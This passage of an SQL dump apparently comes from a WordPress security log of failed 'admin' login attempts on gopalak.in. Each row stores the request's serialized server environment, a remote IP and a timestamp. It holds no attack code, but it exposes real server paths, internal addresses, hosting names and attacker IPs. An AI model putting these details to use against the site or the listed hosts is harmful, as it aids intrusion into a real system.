deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52178\";s:11:\"REMOTE_ADDR\";s:11:\"80.94.97.38\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746773069.182107;s:12:\"REQUEST_TIME\";i:1746773069;}}','80.94.97.38',0,'2025-05-09 12:14:30','1970-01-01 00:00:00'),(95054,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50476\";s:11:\"REMOTE_ADDR\";s:13:\"66.29.132.183\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746773718.6571;s:12:\"REQUEST_TIME\";i:1746773718;}}','66.29.132.183',0,'2025-05-09 12:25:20','1970-01-01 00:00:00'),(95055,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57950\";s:11:\"REMOTE_ADDR\";s:12:\"31.172.67.59\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746774375.6314449;s:12:\"REQUEST_TIME\";i:1746774375;}}','31.172.67.59',0,'2025-05-09 12:36:17','1970-01-01 00:00:00'),(95056,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42646\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.59\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746775039.739466;s:12:\"REQUEST_TIME\";i:1746775039;}}','198.54.114.59',0,'2025-05-09 12:47:21','1970-01-01 00:00:00'),(95057,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53420\";s:11:\"REMOTE_ADDR\";s:14:\"188.166.237.78\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746775692.3648369;s:12:\"REQUEST_TIME\";i:1746775692;}}','188.166.237.78',0,'2025-05-09 12:58:14','1970-01-01 00:00:00'),(95058,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59346\";s:11:\"REMOTE_ADDR\";s:14:\"103.118.29.120\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746776354.538254;s:12:\"REQUEST_TIME\";i:1746776354;}}','103.118.29.120',0,'2025-05-09 13:09:16','1970-01-01 00:00:00'),(95059,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49910\";s:11:\"REMOTE_ADDR\";s:12:\"37.187.26.72\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746777112.1456361;s:12:\"REQUEST_TIME\";i:1746777112;}}','37.187.26.72',0,'2025-05-09 13:21:53','1970-01-01 00:00:00'),(95060,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47192\";s:11:\"REMOTE_ADDR\";s:13:\"81.177.140.54\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746777857.8204451;s:12:\"REQUEST_TIME\";i:1746777857;}}','81.177.140.54',0,'2025-05-09 13:34:19','1970-01-01 00:00:00'),(95061,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44206\";s:11:\"REMOTE_ADDR\";s:14:\"67.223.118.141\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746779359.4036069;s:12:\"REQUEST_TIME\";i:1746779359;}}','67.223.118.141',0,'2025-05-09 13:59:21','1970-01-01 00:00:00'),(95062,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38802\";s:11:\"REMOTE_ADDR\";s:13:\"157.245.6.207\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746780094.2943399;s:12:\"REQUEST_TIME\";i:1746780094;}}','157.245.6.207',0,'2025-05-09 14:11:36','1970-01-01 00:00:00'),(95063,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35214\";s:11:\"REMOTE_ADDR\";s:13:\"170.39.213.43\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746780830.2151999;s:12:\"REQUEST_TIME\";i:1746780830;}}','170.39.213.43',0,'2025-05-09 14:23:52','1970-01-01 